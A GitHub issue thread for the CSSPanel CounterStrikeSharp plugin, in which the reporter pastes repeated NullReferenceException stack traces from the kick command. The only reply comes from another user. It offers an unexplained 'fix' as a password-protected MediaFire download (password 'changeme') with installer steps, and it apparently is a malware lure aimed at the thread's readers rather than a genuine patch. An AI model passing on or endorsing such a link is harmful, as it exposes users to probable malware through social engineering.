### ISSUE TITLE
[BUG] [EROR] (cssharp:Core) Error invoking callback

### ISSUE THREAD

**Issue by crashzk** [CSSPanel/Plugin#7]
```
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at CSSPanel.CSSPanel.Kick(CCSPlayerController caller, CCSPlayerController player, String reason, String callerName, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 457
   at CSSPanel.CSSPanel.<>c__DisplayClass23_0.<OnKickCommand>b__1(CCSPlayerController player) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 433
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at CSSPanel.CSSPanel.OnKickCommand(CCSPlayerController caller, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 426
   at CounterStrikeSharp.API.Core.Commands.CommandManager.HandleCommandInternal(Int32 playerSlot, IntPtr commandInfo) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Commands/CommandManager.cs:line 64
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   at System.Reflection.MethodBaseInvoker.InvokeWithFewArgs(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
2024-09-01 18:08:24.816 -03:00 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at CSSPanel.CSSPanel.Kick(CCSPlayerController caller, CCSPlayerController player, String reason, String callerName, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 457
   at CSSPanel.CSSPanel.<>c__DisplayClass23_0.<OnKickCommand>b__1(CCSPlayerController player) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 433
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at CSSPanel.CSSPanel.OnKickCommand(CCSPlayerController caller, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 426
   at CounterStrikeSharp.API.Core.Commands.CommandManager.HandleCommandInternal(Int32 playerSlot, IntPtr commandInfo) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Commands/CommandManager.cs:line 64
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   at System.Reflection.MethodBaseInvoker.InvokeWithFewArgs(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
2024-09-01 18:08:31.022 -03:00 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at CSSPanel.CSSPanel.Kick(CCSPlayerController caller, CCSPlayerController player, String reason, String callerName, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 457
   at CSSPanel.CSSPanel.<>c__DisplayClass23_0.<OnKickCommand>b__1(CCSPlayerController player) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 433
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at CSSPanel.CSSPanel.OnKickCommand(CCSPlayerController caller, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 426
   at CounterStrikeSharp.API.Core.Commands.CommandManager.HandleCommandInternal(Int32 playerSlot, IntPtr commandInfo) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Commands/CommandManager.cs:line 64
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   at System.Reflection.MethodBaseInvoker.InvokeWithFewArgs(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
2024-09-01 18:08:36.944 -03:00 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at CSSPanel.CSSPanel.Kick(CCSPlayerController caller, CCSPlayerController player, String reason, String callerName, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 457
   at CSSPanel.CSSPanel.<>c__DisplayClass23_0.<OnKickCommand>b__1(CCSPlayerController player) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 433
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at CSSPanel.CSSPanel.OnKickCommand(CCSPlayerController caller, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 426
   at CounterStrikeSharp.API.Core.Commands.CommandManager.HandleCommandInternal(Int32 playerSlot, IntPtr commandInfo) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Commands/CommandManager.cs:line 64
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   at System.Reflection.MethodBaseInvoker.InvokeWithFewArgs(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
2024-09-01 18:08:57.007 -03:00 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at CSSPanel.CSSPanel.Kick(CCSPlayerController caller, CCSPlayerController player, String reason, String callerName, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 457
   at CSSPanel.CSSPanel.<>c__DisplayClass23_0.<OnKickCommand>b__1(CCSPlayerController player) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 433
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at CSSPanel.CSSPanel.OnKickCommand(CCSPlayerController caller, CommandInfo command) in /home/runner/work/Plugin/Plugin/Commands/basecommands.cs:line 426
   at CounterStrikeSharp.API.Core.Commands.CommandManager.HandleCommandInternal(Int32 playerSlot, IntPtr commandInfo) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/Commands/CommandManager.cs:line 64
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Void** arguments, Signature sig, Boolean isConstructor)
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeDirectByRefWithFewArgs(Object obj, Span`1 copyOfArgs, BindingFlags invokeAttr)
   at System.Reflection.MethodBaseInvoker.InvokeWithFewArgs(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/work/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
